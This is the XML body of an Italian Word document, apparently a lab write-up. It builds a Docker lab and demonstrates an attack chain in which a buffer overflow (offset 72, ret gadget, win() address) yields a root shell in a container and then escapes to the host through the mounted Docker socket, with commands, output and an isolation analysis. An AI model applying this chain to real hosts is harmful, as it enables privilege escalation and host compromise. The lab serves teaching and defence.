        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Verifica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dell'ambiente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE3F23" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker --version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1489090B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 version 28.3.3, build 980b856</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682CB0FA" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker info (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>estratto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E59B0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Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111379E0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Containers: 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33373E0C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Images: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69542A9F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Server Version: 28.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF414EA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Storage Driver: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overlayfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AD33837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Cgroup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Driver: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cgroupfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34205C57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Cgroup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Version: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58833E96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Runtimes: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io.containerd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runc.v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2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nvidia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runc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E04D72F" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
        <w:rPr>
          <w:lang w:val="sv-SE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>Default Runtime: runc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC005FB" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
        <w:rPr>
          <w:lang w:val="sv-SE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 xml:space="preserve"> Kernel Version: 6.6.87.2-microsoft-standard-WSL2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B25B35" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
        <w:rPr>
          <w:lang w:val="sv-SE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 xml:space="preserve"> Operating System: Docker Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61BEBF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sv-SE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OSType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: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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CDF6B99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Architecture: x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F879F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CPUs: 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472E410" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/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Total Memory: 7.497GiB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A3F2AE" w14:textId="488A086A" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>6. Costruzione e avvio del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4A758A" w14:textId="5BB8CFE9" w:rsidR="00105CE3" w:rsidRDefault="00105CE3" w:rsidP="00105CE3">
      <w:r>
        <w:t>Costruiamo il container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29996629" w14:textId="29DC5B55" w:rsidR="00105CE3" w:rsidRDefault="00105CE3">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A89C5B" wp14:editId="7551D50A">
            <wp:extent cx="5731510" cy="3554095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="20555086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0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F075" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker compose -f environment/docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3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105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C913E9A" w14:textId="0F03B29C" w:rsidR="00105CE3" w:rsidRDefault="00105CE3" w:rsidP="00105CE3">
      <w:r>
        <w:t>verifichiamo che il container sia attivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F91DE" w14:textId="77777777" w:rsidR="00DE106B" w:rsidRDefault="00105CE3">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D894B2B" wp14:editId="3FDB8641">
            <wp:extent cx="5731510" cy="387985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10778687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8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68F0" w14:textId="0E4E6A80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Scarichiamo l’immagine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>helper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715877C1" wp14:editId="5395BB28">
            <wp:extent cx="5731510" cy="676910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="17425872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87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06C" w14:textId="2D3EF1F8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Piantiamo la Flag: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62D58D42" wp14:editId="0961D7DB">
            <wp:extent cx="5731510" cy="439420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21109375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98A6" w14:textId="1109944A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Entriamo nel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>contaier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378A8BD0" wp14:editId="5922757D">
            <wp:extent cx="5486875" cy="312447"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5726511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3C80" w14:textId="2FB81950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 file nel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>contaier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono questi: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44AFE8AE" wp14:editId="7A4BC0E1">
            <wp:extent cx="5731510" cy="1256030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="7761704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70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49C" w14:textId="7F416D6B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Proviamo il comportamento normale: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2E87E157" wp14:editId="2DDCA312">
            <wp:extent cx="3642676" cy="807790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15471276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27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br/>
        <w:t xml:space="preserve">verifichiamo che </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>la flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> non sia visibile dal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>contaier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0C0FB110" wp14:editId="51086AC9">
            <wp:extent cx="3817951" cy="723963"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10620512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1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506A" w14:textId="0C6D6DBC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Eseguiamo la catena completa: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5D1776AC" wp14:editId="3A2CDB01">
            <wp:extent cx="5731510" cy="2428240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12795912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1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AFB2" w14:textId="4CAAB338" w:rsidR="00DE106B" w:rsidRDefault="00DE106B">
      <w:pPr>
        <w:spacing w:before="100" w:after="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Usciamo dal container e smontiamo tutto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DE106B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BAA57FD" wp14:editId="66021F08">
            <wp:extent cx="5731510" cy="1531620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5060096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09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78B9" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>7. Procedura di sfruttamento (dimostrazione)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B1911" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Baseline (uso normale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD7312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 compose -f environment/docker-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compose.yml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exec -T lab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'cd /lab &amp;&amp; echo "Mario"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| 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/vuln'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079467D6" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Inserisci il tuo nome: Ciao, Mario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63603E9A" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Programma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terminato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normalmente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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4E8D2E" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit: buffer overflow -&gt; shell -&gt; escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B2BDA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 compose -f environment/docker-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compose.yml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exec -T lab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'cd /lab &amp;&amp; python3 exploit.py escape.sh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| .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/vuln'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E13B3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[*]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win(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)      = 0x4011d6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E69B22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[*] ret gadget = 0x40101a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA50C7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[*] offset     = 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759AB94" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Inserisci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il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tuo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nome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: Ciao, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617F29B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14:paraId="2FC2F3BC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[+] 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win(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): shell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nel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container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avviata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="650D3B73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[stage1] shell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nel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container come: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uid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=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEA7E8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[stage1] flag container-local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C5629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APP-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FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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buffer_overflow_shell_in_container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132256E" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[stage2a] lettura diretta della flag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(atteso: errore):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD2D230" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cat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: /host_flag_secret.txt: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D6647D" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[stage2b]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escape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via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socket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Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9DC36" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>HOST-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FLAG{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docker_socket_mount_equals_root_on_host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8E1E46D" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>8. Verifica del risultato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E4632A" w14:paraId="1DC21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3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="4D04F726" w14:textId="77777777" w:rsidR="00E4632A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5800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="528A4691" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Esito atteso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w14:paraId="3E2387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A626B89" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000"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5800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC4349E" w14:textId="77777777" w:rsidR="00E4632A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"Ciao, Mario" e "Programma terminato normalmente."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w:rsidRPr="00105CE3" w14:paraId="1C120A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4004500" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bof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-&gt; shell (id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4963FDF2" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart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uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w:rsidRPr="00105CE3" w14:paraId="4D92B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B3AE48A" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>flag container-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D5E814A" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr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APP-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd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buffer_overflow_shell_in_container</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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E4632A" w:rsidRPr="00105CE3" w14:paraId="4D2DD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F9575CD" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">lettura diretta flag </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D4FE54" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart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cat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: /host_flag_secret.txt: No such file or directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w:rsidRPr="00105CE3" w14:paraId="1AAF8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30EF573" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>escape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socket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FEB2322" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr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HOST-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd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docker_socket_mount_equals_root_on_host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00105CE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5AF2C869" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00E4632A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFF4255" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>9. Analisi tecnica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A076B9" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 Meccanismo di isolamento del container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F74164" w14:textId="45116D5B" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un container Docker </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t xml:space="preserve">è </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un processo Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> isolato tramite funzionalit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t xml:space="preserve">à </w:t>
      </w:r>
      <w:r>
        <w:t>del kernel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F947D48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Namespaces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: vista separata di PID, filesystem/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, rete, utenti, IPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9718D6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Cgroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: limitano e contabilizzano le risorse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A08FE0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>Capabilities: suddividono i privilegi di root, concedendone un sottoinsieme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC5ED1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Seccomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppArmor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: filtrano le system call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E349E" w14:textId="2063028A" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il confine di isolamento previsto </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che le operazioni nel container non influenzino </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Il buffer overflow agisce all'interno di questo confine e fornisce esecuzione di codice nel container. Il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Docker gira come root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sull'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ed espone la sua API sul </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
